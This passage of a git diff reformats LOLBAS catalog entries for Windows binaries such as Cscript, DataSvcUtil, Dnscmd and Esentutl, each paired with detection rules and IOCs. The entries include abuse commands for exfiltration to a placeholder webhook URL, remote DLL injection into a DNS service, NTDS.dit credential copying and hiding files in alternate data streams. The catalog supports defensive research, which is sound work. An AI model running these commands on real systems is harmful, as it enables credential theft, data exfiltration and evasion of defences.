https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +- IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - - Person: - Handle: ---- +- Person: null + Handle: null diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee57..6fa0c205f 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,36 +1,28 @@ ---- Name: Cscript.exe Description: Binary used to execute scripts in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cscript c:\ads\file.txt:script.vbs - Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cscript c:\ads\file.txt:script.vbs + Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate + Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cscript.exe - - Path: C:\Windows\SysWOW64\cscript.exe +- Path: C:\Windows\System32\cscript.exe +- Path: C:\Windows\SysWOW64\cscript.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Cscript.exe executing files from alternate data streams - - IOC: DotNet CLR libraries loaded into cscript.exe - - IOC: DotNet CLR Usage Log - cscript.exe.log +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml Resources: - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20f5..14155f34f 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -1,30 +1,31 @@ ---- Name: DataSvcUtil.exe -Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. -Author: 'Ialle Teixeira' -Created: '01/12/2020' +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services + that consumes an Open Data Protocol (OData) feed and generates the client data service + classes that are needed to access a data service from a .NET Framework client application. +Author: Ialle Teixeira +Created: 01/12/2020 Commands: - - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file - Category: Upload - Privileges: User - MitreID: T1567 - OperatingSystem: Windows 10 +- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe Code_Sample: - - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml - - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. - - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. - - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +- Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml +- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. +- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. +- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching + DataSvcUtil. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services Acknowledgement: - - Person: Ialle Teixeira - Handle: '@NtSetDefault' ---- +- Person: Ialle Teixeira + Handle: '@NtSetDefault' diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc5516d..0107d7833 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -1,29 +1,28 @@ ---- Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 2020-06-28 Commands: - - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr - Description: Downloads the file and sets it as the computer's lockscreen - Usecase: Download arbitrary files from a web server - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10 +- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext + /eventName:desktopimgdownldr + Description: Downloads the file and sets it as the computer's lockscreen + Usecase: Download arbitrary files from a web server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10 Full_Path: - - Path: c:\windows\system32\desktopimgdownldr.exe +- Path: c:\windows\system32\desktopimgdownldr.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml - - IOC: desktopimgdownldr.exe that creates non-image file - - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +- IOC: desktopimgdownldr.exe that creates non-image file +- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl Resources: - - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ +- Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ Acknowledgement: - - Person: Gal Kristal - Handle: '@gal_kristal' ---- +- Person: Gal Kristal + Handle: '@gal_kristal' diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45ab3..74e7b34b0 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -1,29 +1,28 @@ ---- Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, + DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf +- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +- Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index ab75e5dcd..23bb4d944 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -1,38 +1,39 @@ ---- Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file -Author: 'Tamir Yehuda' +Author: Tamir Yehuda Created: 2020-08-08 Commands: - - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an Alternate Data Stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. - - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Description: Download and compress a remote file and store it in a cab file on local machine. - Usecase: Download and compress into a cab file. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 +- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab + Description: Compress taget file into a cab file stored in the Alternate Data Stream + (ADS) of the target file. + Usecase: Hide data compressed into an Alternate Data Stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. +- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab + Description: Download and compress a remote file and store it in a cab file on local + machine. + Usecase: Download and compress into a cab file. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, + Windows Server 2019 Full_Path: - - Path: c:\windows\system32\diantz.exe - - Path: c:\windows\syswow64\diantz.exe +- Path: c:\windows\system32\diantz.exe +- Path: c:\windows\syswow64\diantz.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0593446f96c57a8b64e2b5b9fd15a20f1c56acab/rules/windows/process_creation/win_pc_lolbas_diantz_ads.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_diantz_remote_cab.yml - - IOC: diantz storing data into alternate data streams. - - IOC: diantz getting a file from a remote machine or the internet. +- Sigma: https://github.com/SigmaHQ/sigma/blob/0593446f96c57a8b64e2b5b9fd15a20f1c56acab/rules/windows/process_creation/win_pc_lolbas_diantz_ads.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_diantz_remote_cab.yml +- IOC: diantz storing data into alternate data streams. +- IOC: diantz getting a file from a remote machine or the internet. Resources: - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz Acknowledgement: - - Person: Tamir Yehuda - Handle: '@tim8288' - - Person: Hai Vaknin - Handle: '@vakninhai' ---- +- Person: Tamir Yehuda + Handle: '@tim8288' +- Person: Hai Vaknin + Handle: '@vakninhai' diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c9ba24614..4e99d9baf 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -1,36 +1,35 @@ ---- Name: Diskshadow.exe -Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). -Author: 'Oddvar Moe' +Description: Diskshadow.exe is a tool that exposes the functionality offered by the + volume shadow copy Service (VSS). +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: diskshadow.exe /s c:\test\diskshadow.txt - Description: Execute commands using diskshadow.exe from a prepared diskshadow script. - Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit - Category: Dump - Privileges: User - MitreID: T1003.003 - OperatingSystem: Windows server - - Command: diskshadow> exec calc.exe - Description: Execute commands using diskshadow.exe to spawn child process - Usecase: Use diskshadow to bypass defensive counter measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows server +- Command: diskshadow.exe /s c:\test\diskshadow.txt + Description: Execute commands using diskshadow.exe from a prepared diskshadow script. + Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit + Category: Dump + Privileges: User + MitreID: T1003.003 + OperatingSystem: Windows server +- Command: diskshadow> exec calc.exe + Description: Execute commands using diskshadow.exe to spawn child process + Usecase: Use diskshadow to bypass defensive counter measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows server Full_Path: - - Path: C:\Windows\System32\diskshadow.exe - - Path: C:\Windows\SysWOW64\diskshadow.exe +- Path: C:\Windows\System32\diskshadow.exe +- Path: C:\Windows\SysWOW64\diskshadow.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Child process from diskshadow.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml +- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml +- IOC: Child process from diskshadow.exe Resources: - - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ +- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 64703cb12..b00ad3caa 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -1,35 +1,35 @@ ---- Name: Dnscmd.exe Description: A command-line interface for managing DNS servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. - Usecase: Remotely inject dll to dns server - Category: Execute - Privileges: DNS admin - MitreID: T1543.003 - OperatingSystem: Windows server +- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This + command must be run on a DC by a user that is at least a member of the DnsAdmins + group. See the reference links for DLL details. + Usecase: Remotely inject dll to dns server + Category: Execute + Privileges: DNS admin + MitreID: T1543.003 + OperatingSystem: Windows server Full_Path: - - Path: C:\Windows\System32\Dnscmd.exe - - Path: C:\Windows\SysWOW64\Dnscmd.exe +- Path: C:\Windows\System32\Dnscmd.exe +- Path: C:\Windows\SysWOW64\Dnscmd.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml - - IOC: Dnscmd.exe loading dll from UNC/arbitrary path +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml +- IOC: Dnscmd.exe loading dll from UNC/arbitrary path Resources: - - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp - - Link: https://twitter.com/Hexacorn/status/994000792628719618 - - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html +- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 +- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html +- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp +- Link: https://twitter.com/Hexacorn/status/994000792628719618 +- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html Acknowledgement: - - Person: Shay Ber - Handle: - - Person: Dimitrios Slamaris - Handle: '@dim0x69' - - Person: Nikhil SamratAshok - Handle: '@nikhil_mitt' ---- +- Person: Shay Ber + Handle: null +- Person: Dimitrios Slamaris + Handle: '@dim0x69' +- Person: Nikhil SamratAshok + Handle: '@nikhil_mitt' diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a71..bea45ebad 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -1,70 +1,74 @@ ---- Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o - Description: Copies the source VBS file to the destination VBS file. - Usecase: Copies files from A to B - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. - Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o - Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. - Usecase: Extract hidden file within alternate data streams - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. - Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o - Description: Copies the source EXE to the destination EXE file - Usecase: Use to copy files from one unc path to another - Category: Download - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit - Description: Copies a (locked) file using Volume Shadow Copy - Usecase: Copy/extract a locked file such as the AD Database - Category: Copy - Privileges: Admin - MitreID: T1003.003 - OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server +- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o + Description: Copies the source VBS file to the destination VBS file. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination + file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter + measure + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o + Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. + Usecase: Extract hidden file within alternate data streams + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe + /o + Description: Copies the remote source EXE to the destination Alternate Data Stream + (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter + measure + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe + /o + Description: Copies the source EXE to the destination EXE file + Usecase: Use to copy files from one unc path to another + Category: Download + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit + Description: Copies a (locked) file using Volume Shadow Copy + Usecase: Copy/extract a locked file such as the AD Database + Category: Copy + Privileges: Admin + MitreID: T1003.003 + OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server Full_Path: - - Path: C:\Windows\System32\esentutl.exe - - Path: C:\Windows\SysWOW64\esentutl.exe +- Path: C:\Windows\System32\esentutl.exe +- Path: C:\Windows\SysWOW64\esentutl.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml +- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml +- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml Resources: - - Link: https://twitter.com/egre55/status/985994639202283520 - - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ - - Link: https://twitter.com/bohops/status/1094810861095534592 +- Link: https://twitter.com/egre55/status/985994639202283520 +- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ +- Link: https://twitter.com/bohops/status/1094810861095534592 Acknowledgement: - - Person: egre55 - Handle: '@egre55' - - Person: Mike Cary - Handle: 'grayfold3d' ---- +- Person: egre55 + Handle: '@egre55' +- Person: Mike Cary + Handle: grayfold3d diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 2d5413d23..f195a9a83 100644 --- a/yml/OSBinaries/Eventvwr.yml 